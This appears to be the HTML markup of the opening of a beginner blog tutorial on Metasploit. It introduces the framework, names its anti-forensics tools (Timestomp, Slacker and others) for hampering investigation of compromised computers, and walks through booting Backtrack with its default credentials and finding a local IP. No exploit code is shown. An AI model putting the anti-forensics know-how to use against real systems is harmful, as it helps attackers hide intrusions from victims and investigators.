&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Now, what&amp;nbsp;&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Metasploit&lt;/b&gt;&amp;nbsp;IS?&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;It is an&amp;nbsp;&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;open source penetration testing framework&lt;/u&gt;, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;METASPLOIT ANTI FORENSICS:&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part of&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;MAFIA&lt;/b&gt;(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Metasploit comes in the following&amp;nbsp;&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;versions&lt;/b&gt;:&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;1. CLI (Command Line Interface)&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;2. Web Interface&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;3. MSF Console&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;4. MSFwx&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;5. MSFAPI&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;I would recommend using the MSF Console because of its effectiveness &amp;amp; powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;For those of all who don&#39;t know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Download Backtrack from&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;http://www.backtrack-linux.org/downloads/&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: blue; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;here&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;. You can download the ISO or VMware image, according to the one you&#39;re comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on y&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;our hard disk.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Let the Hacking Begin :&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Open up backtrack. You should have a screen similar to this.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm3k2AI0MrjLGhCv41PXJgC5lLcYHJPHjnCQoMTeqGUCr16pZ4_XdDnNL25ew0vquGItJzvpLE2cuX9Fq163VGXt2yCsyK6w962LvHZqSXQaeAaUnwH1hl7p4k-_Jgu46N5oib2WqpBUlr/s1600/bt4start.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;136&quot; id=&quot;BLOGGER_PHOTO_ID_5584371273402640866&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm3k2AI0MrjLGhCv41PXJgC5lLcYHJPHjnCQoMTeqGUCr16pZ4_XdDnNL25ew0vquGItJzvpLE2cuX9Fq163VGXt2yCsyK6w962LvHZqSXQaeAaUnwH1hl7p4k-_Jgu46N5oib2WqpBUlr/s200/bt4start.JPG&quot; style=&quot;background-color: transparent; border: none; display: block; height: 219px; margin: 0px auto 10px; outline: 0px; padding: 0px; vertical-align: baseline; width: 320px;&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;The default login credentials are:&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Username&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;: root&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Pass&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;: toor&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Type in&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;root@bt:~#/etc/init.d/wicd start&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;to start the wicd manager&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Finally, type &quot;startx&quot; to start the GUI mode:&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;root@bt:~#startx&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; border: 0px; color: blue; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; border: 0px; color: black; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSNPqU5OUBewfUHSdYHMzf2EIcuafiOHVJCis2np2ia6WwWzD9XCDRL4oNWg7sL9g-KjcvTftfWU-LaxWuQbBWd_dzK-z43ovudUcJsAcXEqy_WvZpG5wHeJ30foNDFjIVJ-3jGQPLKfNQ/s1600/btstart.JPG&quot; style=&quot;background-color: transparent; border: none; color: #c11b17; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5584371278406685570&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSNPqU5OUBewfUHSdYHMzf2EIcuafiOHVJCis2np2ia6WwWzD9XCDRL4oNWg7sL9g-KjcvTftfWU-LaxWuQbBWd_dzK-z43ovudUcJsAcXEqy_WvZpG5wHeJ30foNDFjIVJ-3jGQPLKfNQ/s320/btstart.JPG&quot; style=&quot;background-color: transparent; border: none; cursor: pointer; display: block; height: 260px; margin: 0px auto 10px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 320px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; border: 0px; color: blue; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;root@bt:~#ifconfig&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;It would be something like 192.168.x.x or 10.x.x.x.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
